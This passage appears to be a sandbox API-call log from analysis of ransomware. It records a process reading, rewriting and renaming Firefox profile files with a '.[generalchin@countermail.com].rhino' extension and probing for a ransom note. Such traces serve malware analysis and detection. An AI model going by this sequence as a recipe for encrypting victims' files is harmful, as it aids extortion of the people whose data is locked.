out: lpBuffer=0x24b0150*, lpNumberOfBytesWritten=0x2cfa04*=0x120, lpOverlapped=0x0) returned 1 [0100.048] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.048] WriteFile (in: hFile=0x104, lpBuffer=0x26b0040*, nNumberOfBytesToWrite=0x200000, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x26b0040*, lpNumberOfBytesWritten=0x2cfa04*=0x200000, lpOverlapped=0x0) returned 1 [0100.380] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xa00120, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0100.380] CloseHandle (hObject=0x104) returned 1 [0102.849] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75d770 [0102.849] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x136) returned 0x24b02d8 [0102.849] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75d770 | out: hHeap=0x6d0000) returned 1 [0102.850] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\places.sqlite"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\places.sqlite.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0102.851] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b02d8 | out: hHeap=0x6d0000) returned 1 [0102.851] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0150 | out: hHeap=0x6d0000) returned 1 [0102.851] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x26b0020 | out: hHeap=0x6d0000) returned 1 [0102.873] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e97b8 [0102.873] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9870 | out: hHeap=0x6d0000) returned 1 [0102.873] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9870 [0102.873] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x24b0048 [0102.873] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9870 | out: hHeap=0x6d0000) returned 1 [0102.873] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0102.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0102.874] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\pluginreg.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0102.979] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0xe14 [0102.979] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xf34, nNumberOfBytesToLockHigh=0x0) returned 1 [0102.980] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0102.980] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0102.983] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.983] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0xe14, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0xe14, lpOverlapped=0x0) returned 1 [0102.983] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0102.983] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0102.983] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0102.983] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e74c8 [0102.984] GetLastError () returned 0x0 [0102.984] SetLastError (dwErrCode=0x0) [0102.984] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0102.984] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe14) returned 0x24b0048 [0102.984] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0102.984] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x24b0e68 [0102.984] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b0048 [0102.984] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0e68 | out: hHeap=0x6d0000) returned 1 [0102.984] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.984] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0102.984] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0102.984] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0102.984] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0102.984] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0102.984] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0102.984] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0102.985] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0102.985] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0102.985] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0102.985] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0102.985] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df0f8 [0102.985] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0102.985] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0102.985] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0102.985] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0102.985] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0102.985] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0102.985] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0102.985] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e74c8 [0102.985] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0102.985] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0102.985] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0102.985] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0102.985] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0102.985] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x24b0e68 [0102.985] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0102.985] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23b01d0 [0102.985] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0e68 | out: hHeap=0x6d0000) returned 1 [0102.986] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x23b0318 [0102.986] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01d0 | out: hHeap=0x6d0000) returned 1 [0102.986] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x23b0500 [0102.986] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0318 | out: hHeap=0x6d0000) returned 1 [0102.986] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x23b07d0 [0102.986] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0500 | out: hHeap=0x6d0000) returned 1 [0102.986] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x75ef78 [0102.986] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b07d0 | out: hHeap=0x6d0000) returned 1 [0102.986] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x23b01d0 [0102.986] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0102.986] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x75ef78 [0102.986] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01d0 | out: hHeap=0x6d0000) returned 1 [0102.986] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x75fd90 [0102.986] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0102.986] WriteFile (in: hFile=0xec, lpBuffer=0x75fda0*, nNumberOfBytesToWrite=0xf34, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x75fda0*, lpNumberOfBytesWritten=0x2cfa04*=0xf34, lpOverlapped=0x0) returned 1 [0103.711] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75fd90 | out: hHeap=0x6d0000) returned 1 [0103.711] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xf34, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0103.711] CloseHandle (hObject=0xec) returned 1 [0103.713] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75d770 [0103.713] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x136) returned 0x24b0e68 [0103.713] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75d770 | out: hHeap=0x6d0000) returned 1 [0103.713] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\pluginreg.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\pluginreg.dat.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0103.714] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0e68 | out: hHeap=0x6d0000) returned 1 [0103.714] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0103.714] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0103.714] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9870 [0103.714] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e97b8 | out: hHeap=0x6d0000) returned 1 [0103.714] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e97b8 [0103.714] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x24b0048 [0103.715] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e97b8 | out: hHeap=0x6d0000) returned 1 [0103.715] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0103.715] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0103.715] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\prefs.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0103.716] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0xfde [0103.716] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10fe, nNumberOfBytesToLockHigh=0x0) returned 1 [0103.716] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0103.716] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0103.719] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.719] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0xfde, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0xfde, lpOverlapped=0x0) returned 1 [0103.719] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0103.719] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0103.719] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0103.719] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e74c8 [0103.719] GetLastError () returned 0x0 [0103.719] SetLastError (dwErrCode=0x0) [0103.719] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0103.719] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xfde) returned 0x75ef78 [0103.720] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0103.720] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x24b0048 [0103.720] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x24b0150 [0103.720] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0103.720] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.720] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0103.720] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0103.720] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0103.720] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0103.720] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0103.720] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0103.720] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0103.720] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0103.720] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0103.720] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df0f8 [0103.720] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0103.720] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0103.721] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0103.721] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0103.721] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0103.721] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0103.721] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0103.721] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0103.721] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0103.721] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e74c8 [0103.721] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0103.721] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0103.721] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0103.721] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0103.721] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0103.721] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x24b0048 [0103.721] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0103.721] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x24b02d8 [0103.721] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0103.721] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x24b0420 [0103.722] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b02d8 | out: hHeap=0x6d0000) returned 1 [0103.722] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x24b0608 [0103.722] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0420 | out: hHeap=0x6d0000) returned 1 [0103.722] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x24b08d8 [0103.722] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0608 | out: hHeap=0x6d0000) returned 1 [0103.722] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x23b0048 [0103.722] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b08d8 | out: hHeap=0x6d0000) returned 1 [0103.722] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x24b02d8 [0103.722] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0103.722] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x23b0048 [0103.722] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b02d8 | out: hHeap=0x6d0000) returned 1 [0103.722] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x75ff60 [0103.722] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0103.722] WriteFile (in: hFile=0xec, lpBuffer=0x75ff80*, nNumberOfBytesToWrite=0x10fe, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x75ff80*, lpNumberOfBytesWritten=0x2cfa04*=0x10fe, lpOverlapped=0x0) returned 1 [0103.723] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ff60 | out: hHeap=0x6d0000) returned 1 [0103.723] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10fe, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0103.723] CloseHandle (hObject=0xec) returned 1 [0103.724] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75d770 [0103.724] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x136) returned 0x24b02d8 [0103.724] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75d770 | out: hHeap=0x6d0000) returned 1 [0103.724] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\prefs.js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\prefs.js.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0103.725] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b02d8 | out: hHeap=0x6d0000) returned 1 [0103.725] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0150 | out: hHeap=0x6d0000) returned 1 [0103.725] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0103.725] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e97b8 [0103.725] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9870 | out: hHeap=0x6d0000) returned 1 [0103.725] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9870 [0103.725] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x24b0048 [0103.725] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9870 | out: hHeap=0x6d0000) returned 1 [0103.725] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0103.725] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0103.725] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\search.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0103.727] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x4183 [0103.727] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x42a3, nNumberOfBytesToLockHigh=0x0) returned 1 [0103.727] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0103.727] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0103.730] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.730] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x4183, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x4183, lpOverlapped=0x0) returned 1 [0103.731] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) 